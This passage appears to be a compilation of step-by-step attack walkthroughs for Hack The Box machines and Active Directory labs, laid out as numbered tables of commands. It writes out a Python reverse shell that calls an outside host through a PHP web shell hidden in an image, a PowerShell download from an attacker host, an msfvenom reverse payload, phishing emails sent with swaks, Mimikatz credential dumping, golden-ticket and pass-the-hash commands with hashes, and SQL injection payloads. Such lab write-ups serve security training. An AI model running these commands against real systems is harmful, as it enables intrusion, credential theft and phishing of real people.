Using ffuf for Subdomain Brute-Forcing
./ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://sneakycorp.htb/ -H "Host: FUZZ.sneakycorp.htb"
3
Email Collection
Extracting Emails from Web Page
Manually visit http://sneakycorp.htb/team.php and extract emails to mails.txt
4
Email Engagement
Sending Emails with swaks
while read mail; do swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials / Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197; done < mails.txt
5
Credential Harvesting
Netcat Listener
nc -lvp 80 to listen for incoming connections
6
Accessing SMTP
Using evolution to Access SMTP
apt-get install evolution and configure with SMTP server 10.10.10.197 and email paulbyrd@sneakymailer.htb
7
Exploring Sent Items
Checking Sent Emails
Check sent items for any useful information after accessing the SMTP server
1
Reconnaissance
Web Server Analysis
Manual inspection of web application on port 80/tcp
2
Vulnerability Analysis
JWT Token Analysis
Decode JWT token, notice "kid" parameter pointing to an internal address
3
Exploitation
Custom JWT Token Creation
Develop jwt-token.py to generate a custom JWT token
4
Administration Panel Access
Access with JWT Token
Use generated JWT token to access the admin panel
5
Web Shell Upload
PHP File Upload
Upload a malicious PHP file as allowed by the admin panel
6
Reverse Shell
Exploit PHP File
Get a reverse shell as www-data from the uploaded PHP file
7
Post-Exploitation
User Access
Use home.tar.gz from /var/backups/ to login as user noah with SSH
8
Privilege Escalation
Docker Exploitation
Use docker exec -it webappdev01* as administrator
9
Root Access
CVE-2019-5736 Exploit
Modify and run CVE-2019-5736 exploit to get root access
1
Reconnaissance
Nmap Scan
nmap -sV -sT -sC -o nmapinitial ai.htb
2
Web Enumeration
Manual Inspection
Inspect web application on port 80/tcp, hover over logo for menu
3
Web Enumeration
Gobuster Directory Scan
gobuster dir -u http://ai.htb/ -w /usr/share/wordlists/dirb/common.txt
4
Audio File Handling
Convert MP3 to WAV
ffmpeg -i input.mp3 output.wav
5
SQL Injection
Extract Database Name
Audio payload: "one open single quote union select database open parenthesis close parenthesis comment database"
6
SQL Injection
Enumerate Table Names
Audio payload: "one open single quote union select test from test comment database"
7
SQL Injection
Enumerate Users Table
Audio payload: "one open single quote union select test from users comment database"
8
SQL Injection
Extract Passwords
Audio payload: "one open single quote union select password from users comment database"
9
Privilege Escalation
Exploit JDWP Service
Use jdwp-shellifier.py with reverse shell payload
1
Initial Recon
Nmap Scan
nmap -sC -sV -sS 10.10.10.184
2
FTP Enumeration
Anonymous FTP Access
ftp 10.10.10.184 (then use ls, cd, get commands to interact)
3
File Analysis
Reviewing Downloaded Files
get "Notes to do.txt", get "Confidential.txt"
4
Web Enumeration
Enumerate Web Pages
Manual inspection of web application on port 80/tcp
5
Exploitation
Exploit NVMS-1000 (CVE-2019-2085)
Use CVE details from Exploit-DB and Brup Suite to exploit
6
Credential Access
Extract Passwords via Directory Traversal
GET /../../../../../../../../../../../../windows/Users/Nadine/Desktop/Passwords.txt
7
Brute Force
SSH Brute Force with Hydra
hydra -L users.txt -P pass.txt 10.10.10.184 ssh
8
SSH Access
Login via SSH
SSH login with found credentials
9
Privilege Escalation
Exploit NSClient++ 0.5.2.35
Follow CVE details from Exploit-DB to exploit NSClient++
10
Local Port Forwarding
Port Forwarding via SSH
Use SSH port forwarding to interact with local services
1
Recon
Nmap Scan
nmap -sC -sV -sS 10.10.10.171
2
Web Enumeration
Manual Visit, Gobuster
Visit http://10.10.10.171, gobuster dir -u http://10.10.10.171/ -w common.txt
3
Exploitation
OpenNetAdmin RCE
Use exploit from amriunix/ona-rce repository
4
Initial Foothold
Reverse Shell
Gain reverse shell as www-data
5
User Access
Password Reuse
SSH as jimmy with reused credentials
6
Internal Service Access
Port Forwarding
Forward port 52846 to local machine and access internal service
7
Privilege Escalation
Cracking Hash
Crack sha512 hash to obtain jimmy's password
8
SSH Key Access
Decrypt SSH Key
Use ssh2john and john to decrypt Joanna's SSH key
9
Root Access
Sudo Exploitation of Nano
Use nano with sudo to gain root shell based on GTFOBins
1
Nmap Scanning
Nmap Scan
nmap -sC -sV -sS -T4 10.10.10.185
2
Enumerating Web Page
Manual Visit
Visit http://10.10.10.185
3
Bypass Login
SQL Injection
Use 'or''=' for both username and password
4
Uploading Shell
Bypass File Upload Restrictions
exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' me.jpg
5
Gaining Access
Reverse Shell
http://10.10.10.185/images/uploads/me.php.jpg?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.43",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
6
Enumerating Credentials
Reading Configuration Files
cat /var/www/Magic/db.php5
7
Switching User Shell
User Switching
su theseus with password iamkingtheseus
8
Find SUID files
Privilege Escalation
Not specified in the summary
9
Getting ROOT
Exploitation
Not specified in the summary
1
Recon
Nmap Scan
nmap -sC -sV -sS -T4 10.10.10.229
2
Web Enumeration
Manual Visit, Gobuster
Visit http://10.10.10.229, gobuster dir -u http://10.10.10.229/ -w common.txt
3
Web Enumeration
Inspect Source Code
Inspect source code of http://spectra.htb/wp-config.php.save
4
Credential Access
Username and Password Discovery
Found credentials: username administrator, password devteam01
5
Web Exploitation
WordPress Admin Login
Login to WordPress admin panel with found credentials
6
Reverse Shell
Metasploit Reverse Shell
Use msfconsole and exploit/unix/webapp/wp_admin_shell_upload
7
Privilege Escalation
Sudo Privileges Exploitation
Use sudo with initctl for privilege escalation
8
Privilege Escalation
Editing Service Configuration
Edit /etc/init/test.conf to add chmod +s /bin/bash
9
Privilege Escalation
Gaining Root Access
Execute /bin/bash -p to spawn a shell with root privileges
1
Recon
Nmap Scan
nmap -sC -sV -p- 10.10.10.225
2
Web Enumeration
Inspect Source Code
Inspect source code for CVE-2019-18277 vulnerability
3
Exploitation
HTTP Request Smuggling
Edit and send crafted HTTP requests to exploit CVE-2019-18277
4
Post-Exploitation
Capture Admin Cookie
Reload the home page to capture the admin cookie after the exploit
5
Privilege Access
Use Credentials Found in Notes
Use credentials from notes to access different services (Chef, Dev Node, Nagios)
6
Privilege Access
Access Gitea Service
Log in to Gitea service with found credentials
7
Privilege Access
Find SSH Key for User
Find id_rsa_marcus key for user Marcus on Gitea service
8
Privilege Access
Use SSH Key to Gain Access
Use id_rsa_marcus to SSH into the machine as Marcus
1
Recon
Nmap Scan
nmap -sC -sV -p- 10.10.10.220
2
Web Enumeration
GitLab Sign In Page
Inspect GitLab sign in page for vulnerabilities
3
Exploitation
GitLab 11.4.7 Remote Code Execution
Follow steps from LiveOverflow video & article for RCE
4
Reverse Shell
Gain Reverse Shell
Use the payload from the video to gain a reverse shell
5
Post-Exploitation
Find Credentials
Locate gitlab.rb in /opt/backup to find SMTP password
6
Privilege Access
Use Found Credentials
Use found SMTP password to change user and gain root access in the docker container
7
Privilege Escalation
Escaping Docker Container
Follow steps from the "Escaping Docker Privileged Containers" article to escalate privileges
8
Root Access
SSH Key
Use the provided id_rsa key to SSH into the root account
1
Recon
Nmap Scan
nmap -sC -sV -oA nmap/result 10.10.10.240
2
FTP Enumeration
Anonymous FTP Access
ftp -pi 10.10.10.240 followed by ls and mget * to download files
3
Metadata Analysis
ExifTool Analysis
`exiftool *
4
Kerberos Attack
GetNPUsers.py Kerberos Preauthentication
GetNPUsers.py -dc-ip 10.10.10.240 -no-pass -usersfile user.lst LicorDeBellota/
5
Hash Cracking
John the Ripper
john hash -w=/usr/share/wordlists/rockyou.txt to crack Kerberos hash
1
Initial Scanning
Nmap Scan
nmap -sC -sV -oN nmap 10.10.10.199
2
Web Enumeration
Directory Scan
dirsearch -u 10.10.10.199 -w /opt/common.txt -e *
3
Exploitation
Vulnerability in OpenBSD
Use -schallenge as a username to bypass authentication
4
SSH Key Discovery
Cookie Modification
Modify the cookie to include a valid username to reveal SSH keys
5
SSH Access
Use Discovered SSH Key
ssh -i id_rsa jennifer@10.10.10.199
6
Privilege Escalation
Local Exploit for OpenBSD
nano authroot; chmod +x authroot; ./authroot to exploit CVE-2019-19520 / CVE-2019-19522
1
Reconnaissance
Nmap Scan
nmap -sV -sC -T4 -p- oouch.htb
2
Web Enumeration
Directory Scan
gobuster dir -u http://oouch.htb:5000/ -w big.txt
3
OAuth Exploitation
SSRF in Contact Page
Use SSRF to link account with admin
4
Access Token
Intercept Request with Burp
Intercept /oauth/connect request to get token-code
5
SSH Key Discovery
Accessing SSH Private Keys
Access API to retrieve SSH keys
6
Docker Exploitation
Exploit Docker UWSGI Service
Log into Docker and exploit UWSGI service running as www-data
7
Privilege Escalation
Exploit Dbus
Exploit Dbus to get a shell as root and obtain root.txt
1
Recon
Nmap scan
nmap -sV -sC -v -T4 -oA scans/nmap.full -p- fuse.htb
2
Enumeration
Enumerating SMB, HTTP, and RPC
enum4linux fuse.htb, smbclient -L fuse.htb, rpcclient -U FABRICORP\\tlavel 10.10.10.193
3
Exploitation
Password Spraying
msf > use auxiliary/scanner/smb/smb_login, medusa -h fuse.htb -U users.txt -P wordlist -M smbnt
4
Privilege Escalation
Abusing SeLoadDriverPrivilege
Compiling files with Visual Studio, using eoploaddriver.exe and ExploitCapcom.exe
5
Post-Exploitation
Accessing Admin Shell
evil-winrm -u Administrator -H <hash> -i fuse.htb
1
Recon
Nmap scan to find open ports
nmap -sC -sV -oA /result 10.10.10.212
2
Enumeration
Gobuster to find directories
gobuster dir -u http://s3.bucket.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
3
AWS Configuration
Configure AWS CLI
aws configure
4
Data Extraction
List tables and contents in DynamoDB
aws dynamodb list-tables --endpoint-url http://s3.bucket.htb/ --no-sign-request
aws dynamodb scan --table-name users --endpoint-url http://s3.bucket.htb/ --no-sign-request
5
Exploitation
Upload PHP reverse shell to the server
aws --endpoint-url http://s3.bucket.htb/ s3 cp /root/Desktop/HTB/Bucket/shell.php s3://adserver/images/
6
Privilege Escalation
Port forwarding and exploiting a web service for code execution as root
ssh -L 8000:127.0.0.1:8000 roy@10.10.10.212
Create and trigger payload to get root's id_rsa
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000/ -v
1
Recon
Nmap scanning
nmap -sC -sV -oA nmap/result 10.10.10.233
2
Exploitation
Drupalgeddon 2 Forms API Property Injection
msf6 > use exploit/unix/webapp/drupal_drupalgeddon2 followed by setting options and run
3
Gaining Access
Finding credentials in settings.php
Inspect /var/www/html/sites/default/settings.php for MySQL credentials
4
Database Access
Accessing MySQL database
mysql -u drupaluser -p -e 'show databases;'
5
Data Exfiltration
Dumping usernames and password hashes
mysql -u drupaluser -p -D drupal -e 'select name,pass from users;'
6
Password Cracking
Using John the Ripper to crack password hashes
john hash -w=/usr/share/wordlists/rockyou.txt
7
Access with SSH
SSH into the machine with cracked credentials
ssh brucetherealadmin@10.10.10.233
8
Privilege Escalation
Exploiting snapd (dirty_sock exploit)
Use the dirty_sock exploit to escalate privileges
9
Capture Flag
Reading user and root flags
cat user.txt and cat root.txt
1
Recon
Nmap scanning
nmap -sC -sV 10.10.10.181
2
Enumeration
Source code analysis, Gobuster
gobuster dir -w shells.txt -u http://10.10.10.181
3
Exploitation
Accessing web shell
Navigate to http://10.10.10.181/smevk.php, login with default creds
4
Access
SSH key upload
ssh-keygen, upload id_rsa.pub as authorized_keys
5
Initial Access
SSH as webadmin
ssh webadmin@10.10.10.181 -i id_rsa
6
Privilege Escalation (User)
Using luvit to execute commands as sysadmin
sudo -u sysadmin /home/sysadmin/luvit, then os.execute("/bin/bash -i")
7
Capture User Flag
Reading user flag
cat /home/sysadmin/user.txt
8
Privilege Escalation (Root)
Modifying 00-header for command execution
echo "id" >> /etc/update-motd.d/00-header
9
Capture Root Flag
Reading root flag
echo "cat /root/root.txt" >> /etc/update-motd.d/00-header
1
Initial Scanning
Masscan
masscan -p 80,135,139,445,443 -sT 10.10.110.0/24 -e tun0
2
Host Discovery
Nmap Scan
nmap scan on 10.10.110.10, nmap scan on 10.10.110.254
3
Domain Discovery
CrackMapExec
crackmapexec on 10.10.110.10, crackmapexec on 10.10.110.254
4
Network Mapping
Host Enumeration
Hostnames and IPs: DC01 - 10.10.120.1, FS01 - 10.10.120.5, etc.
1
Reconnaissance
Outlook Version Discovery
Check outlook version on port 443 at 10.10.110.254
2
Enumeration
Web Page Analysis
Analyze Rastalabs website on 10.10.110.10 on port 80
3
User Profiling
Social Media Analysis
Review Amber Hope's LinkedIn and Instagram profiles
4
Credential Access
Brute Force
Use Metasploit auxiliary/scanner/http/owa_login to brute force
5
Access
Outlook Login
Login with credentials 'RLAB\ahope' : 'Labrador8209'
6
Flag Discovery
Task Navigation
Navigate to tasks in Outlook to find the flag RASTA{ph15h1n6_15_h4rdc0r3}
1
Credential Dumping
Vault Credential Extraction
Get-ChildItem C:\Users\epugh\AppData\Local\Microsoft\Credentials\ -force
2
Credential Dumping
Mimikatz Execution
sekurlsa::dpapi, dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\<HASH>
3
Credential Decryption
DPAPI Master Key Usage
dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\Credentials\<HASH> /masterkey:<MASTER_KEY>
4
Remote Desktop
Port Forwarding
portfwd add -L 10.10.14.83 -r 10.10.122.15 -l 3389 -p 3389
5
Remote Desktop
Remmina Configuration
Import .rdp file, change host, export to .rdp file
6
Remote Desktop
FreeRDP Connection
xfreerdp sql.rdp /u:epugh_adm /d:rastalabs.local
7
Flag Discovery
Task Navigation
Flag found: RASTA{c00k1n6_w17h_645_n0w}
1
RDP Access
Remote Desktop Protocol
Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using epugh_adm creds
2
GPO Enumeration
Group Policy Object Enumeration
`Get-NetGPO
3
Group Membership
Group Membership Checking
net user epugh_adm /domain
4
GPO Permission Find
GPO Permission Enumeration
`Get-NetGPO -ComputerName fs01.rastalabs.local
5
GPO Abuse
Group Policy Object Abuse
New-GPOImmediateTask -TaskName gop12i -GPODisplayName "Test GPO" -CommandArguments 'net user gopikrishna Ramco@12345 /add' -force
6
Add to Administrators
Adding User to Administrators Group
New-GPOImmediateTask -TaskName gopi131 -GPODisplayName "Test GPO" -CommandArguments 'net localgroup Administrators gopikrishna /add' -force
7
Clean Up
Group Policy Object Task Removal
New-GPOImmediateTask -Remove -Force -GPODisplayName "Test GPO"
8
File Permissions
Modifying File Access Control Lists
icacls flag.txt /grant administrators:F
9
Flag Discovery
Retrieving Sensitive Information
Flag found: RASTA{6p0_4bu53_15_h4rdc0r3}
1
RDP Access
Remote Desktop Protocol
Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using epugh_adm creds
2
SQL Interaction
SQL Server Management Studio
Start SQL Management Studio, connect via Windows authentication, query Umbraco database
3
Data Extraction
SQL Query Execution
SELECT TABLE_NAME FROM umbraco.INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE'
4
Flag Discovery
SQL Data Retrieval
select * from Flag which revealed the flag RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}
1
RDP Access
Remote Desktop Protocol
Logged in to web01 (10.10.110.10) and took RDP of sql01 (10.10.122.15) using epugh_adm creds
2
Credential Dumping
Invoke Mimikatz
Run p0wnedshell.exe with admin cmd, option 4, invoke mimikatz to get the NTLM hash of rweston_da
3
Pass-the-Hash
Mimikatz Pass-the-Hash
sekurlsa::pth /user:rweston_da /domain:rastalabs.local /ntlm:3ff61fa259deee15e4042159d7b832fa
4
Golden Ticket
Kerberos Golden Ticket Attack
kerberos::golden /domain:rastalabs.local /user:rweston_da /sid:S-1-5-21-... /krbtgt:1b6e14bc52b67a2357f7938a8bbceb1b /ticket:C:\Users\GOPIKR~1\Desktop\rweston_da.ticket
5
Ticket Injection
Kerberos Ticket Injection
kerberos::ptt C:\Users\GOPIKR~1\Desktop\rweston_da.ticket
6
Flag Discovery
Access Domain Controller
pushd \\dc01.rastalabs.local\C$ to access the domain controller and discover the flag RASTA{r4574l4b5_ch4mp10n}
1
Port Forwarding
Local Port Forwarding
portfwd add -L 10.10.14.83 -r 10.10.121.100 -l 445 -p 445
2
Remote Shell Access
MSF psexec / Impacket psexec
Use msf or impacket psexec to get shell on ws01
3
Routing
Meterpreter Routing
Add route in meterpreter, set socks4a proxy in msf
4
Hash Dumping
CrackMapExec with Proxychains
proxychains crackmapexec 10.10.120.1 -u rweston_da -H ab7b75ff84475be2e8c4dcb7390955c3:3ff61fa259deee15e4042159d7b832fa --ntds drsuapi
5
Credential Access
Mimikatz Credential Dump
dpapi::cred /in:C:\\users\\rweston\\AppData\\Local\\Microsoft\\Credentials\\849B07832DF408F54711A4BD0EB36FD5 /masterkey:bbfdda29906cd49b7ca3e019a1f2dd79d153611a2c3e932520e41b3d228cec844e2ae46faa2abe236612f52da93b26e85d08c562a7288327d318a65b641f23af
6
Clipboard Monitoring
PowerShell Clipboard Monitoring
Use PowerShell to monitor clipboard: powershell -command "& { iwr http://10.10.14.83/emp.bat -OutFile empire_new.bat}"
7
RDP Connection
Remote Desktop Connection
xfreerdp /u:epugh_adm /p:IReallyH8LongPasswords! /v:10.10.110.10
8
Flag Discovery
Flag Retrieval
Flag found: RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}
1
Port Forwarding
Local Port Forwarding
portfwd add -L 10.10.14.83 -r 10.10.120.1 -l 445 -p 445
2
Remote Shell
Impacket psexec
Use impacket psexec to get shell on dc01
3
Log Enumeration
Windows Event Logs
`Get-EventLog -LogName "Application"
4
Flag Discovery
Log Analysis
Flag found: RASTA{1nc1d3n7_r35p0nd3r5_l0v3_l065}
1
File Access
Accessing Network Share
net use Q: \\fs01.rastalabs.local\home$\ahope /user:ahope "Labrador8209"
2
File Conversion
Convert PPK to OpenSSH
puttygen nix01.ppk -O private-openssh -o nix
3
SSH Connection
Proxychains with SSH
proxychains ssh -i nix ahope@10.10.122.20
4
Privilege Escalation
Compile and Transfer Exploit
gcc exp1.c -o exploit and proxychains scp -i nix -r exploit ahope@10.10.122.20:/home/ahope
5
File Transfer
Secure Copy (SCP) with Proxychains
proxychains scp -i nix ahope@10.10.122.20:/usr/local/sbin/paycalc /root/Desktop/rasta
6
Flag Discovery
Flag Retrieval
Flag found: RASTA{y0ur3_4_b4lh15}
1
Initial Recon
NMAP Scan
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.12
2
Web Enumeration
Directory Enumeration with wfuzz
wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ
3
SMTP Enumeration
smtp-user-enum
smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12
4
Phishing
Crafting Email
telnet 10.13.38.12 25 followed by SMTP commands
5
Access
Citrix XenAPP
Login with captured credentials
6
Gaining a Shell
Reverse Shell with msfvenom
msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe > x86exploit.exe
7
Privilege Escalation
Local Exploit Suggester
use post/multi/recon/local_exploit_suggester in Metasploit
8
Network Scanning
Internal Network Scan
Use auxiliary/server/socks4a in Metasploit for proxying
9
Kerberoasting
Harvesting Tickets
Invoke-Kerberoast in PowerShell
10
Password Cracking
hashcat
hashcat -m 13100 ./mturner rockyou.txt --rules
11
SMB Access
smbmap and smbclient
smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
12
Putty File Conversion
putty2john
putty2john private.ppk > private.hash
13
NetScaler Access
SSH with Private Key
ssh -i id_rsa nsroot@172.16.249.202
14
Traffic Analysis
tcpdump
`tcpdump -s 0 -A -n -l
15
LDAP Passwords
Capture and Analyze with Wireshark
tcpdump -w capture.pcap and analyze with Wireshark
16
Domain Privilege
WinRM Access
ruby winrm_shell_with_upload.rb
17
Shadow Copies
Diskshadow
diskshadow commands to create and expose shadow copies
18
Domain Admin Access
Pass the Hash
wmiexec.py -hashes :aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200
1
Reconnaissance
- Nmap scan - Enumerating SMB
- nmap -sC -sV -oA nmap/initial 10.10.11.130
- smbclient -L \\\\10.10.11.130\\
2
Gaining Access
- Exploiting SMB vulnerability
- smbclient \\\\10.10.11.130\\backups
3
Enumeration
- Searching for files - Analyzing found files
- get "Azure Diamond.json"
4
Privilege Esc.
- Using credentials found - Accessing Azure
- evil-winrm -i 10.10.11.130 -u 'azureuser' -p 'MyPassword!'
5
Post-Exploitation
- Dumping hashes - Cracking hashes
- hashdump
- john hashes --wordlist=/usr/share/wordlists/rockyou.txt
1
Recon
Scanning with nmap
nmap -p- --min-rate 10000 10.10.11.225
2
SMB Enumeration
Enumerate shares with netexec
netexec smb 10.10.11.225 --shares
3
SMB Access
Access SMB share with smbclient
smbclient //10.10.11.225/shares -N
4
Email Analysis
Analyze backup email
cat mail (after retrieving the file)
5
Subdomain Enum
Brute force subdomains with ffuf
ffuf -u http://10.10.11.225 -H "Host: FUZZ.gofer.htb" -w wordlist -mc all -ac
6
Proxy Access
Fuzzing HTTP methods on proxy
feroxbuster -u http://proxy.gofer.htb -m GET,POST,PUT,OPTIONS,CONNECT -x php